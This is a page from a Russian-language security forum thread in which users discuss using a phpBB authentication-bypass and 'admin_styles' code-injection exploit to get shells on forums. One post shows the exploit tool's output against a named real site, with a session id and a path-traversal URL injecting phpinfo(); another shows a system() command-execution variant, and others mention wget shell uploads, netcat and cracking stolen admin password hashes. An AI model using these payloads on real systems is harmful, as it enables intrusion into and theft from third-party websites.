Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 4 5 6 7 8 След.
RSS
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
 
Хелпер
Там пишут что мой ip блокирован я поставил прокси ..всеравно никак...
 
Хелпер - клевая статья)))) [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
как выполнить команды и как сделать шелл ?
вот этого только я не понял...
 
так с cmd почти разобрался...
мдя...так шелл...хотя есть мысля
 
Используем функцию wget
всё равботает...
всё думаю тема закрыта
 
Как закрыта ? Кто нибуть шелл получить смог ?
 
Да, я смог получить...тема закрыта...
тут мозгов почти и не надо что бы шелл залить
 
блин... изза этого бага я познакомился с отделом К моего города еперь сижу с чужого винта и собираю бабло на фзятки....мляяяяяя
 
Я так понял сплоит даёт хэш юзера с айди 1. Можно как-то сменить?
 
Решил попробовать я этот сплоит.
Запустил:
C:\My Downloads\bbsh>bbsh http://www.xxx.ru/forum/ xx.xxx.xxx.xxx 8080
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 98e2313c846b33ee9d3d59b5b6fd0fcf
http://www.spekulant.ru/forum/?sid=98e2313c846b33ee9d3d59b5b 6fd0fcf
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier crщe
_ Code executщ
http://www.spekulant.ru/forum/admin/admin_styles.php?mode=ad dnew&install_to=../.
./../../../../../../../../../../../../../../../../../tmp&nig ga=phpinfo();&sid=98
e2313c846b33ee9d3d59b5b6fd0fcf

C:\My Downloads\bbsh>

вот что выдало:

Вставил я  http://www.spekulant.ru/forum/admin/admin_styles.php?mode=ad dnew&install_to=../.
./../../../../../../../../../../../../../../../../../tmp&nig ga=phpinfo();&sid=98
e2313c846b33ee9d3d59b5b6fd0fcf
в адресную строку своего firefox, перед этим удалил почистил у себя кукисы.
Только вот в админку я не попал, вылазиет страница входа, где предлагает ввести логин и пароль....
Вообщем подскажите что делать......:)
 
Великолепный сплоит. Единственное я шелл не выбил.
 
люди выложьте экзешный сплоит куданить а то ссылка уже не работает
 
Ага, гн одна ссылка не пашет,киньте рабочую!!!
 
Цитата
Step пишет:
Получаешь админку, выкачиваешь базу, выбираешь пароли, открываешь их, и имеешь пароли реальных админов... и уже никакие обновления не  спасут [IMG]http://www.securitylab.ru/forum/smileys/smiley29.gif[/IMG]
Чем расшифровать пароли из phpbb_db_backup.
 
Цитата
Гость пишет:
Как закрыта ? Кто нибуть шелл получить смог ?
КАК,?
 
Цитата
][лам пишет:
получал...
http://www.*.ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../.
./../../../../../../../../../../../../../../../tmp&nigga=sys tem(fuck);&fuck=ls -la&sid=***
вот это пишет Parse error: parse error, unexpected T_STRING in /tmp/theme_info.cfg(8) : eval()d code on line 1
 
Может кто нибудь разъяснить как сделать шелл,
заранее благодарен
 
where a new link for a nc4hk.swf plsssss ????
 
дайте ссылку плиз.
 
nc4hk.swf  is netcat for linux you can replace it ...
(bulgaria:)
Страницы: Пред. 1 ... 4 5 6 7 8 След.
Читают тему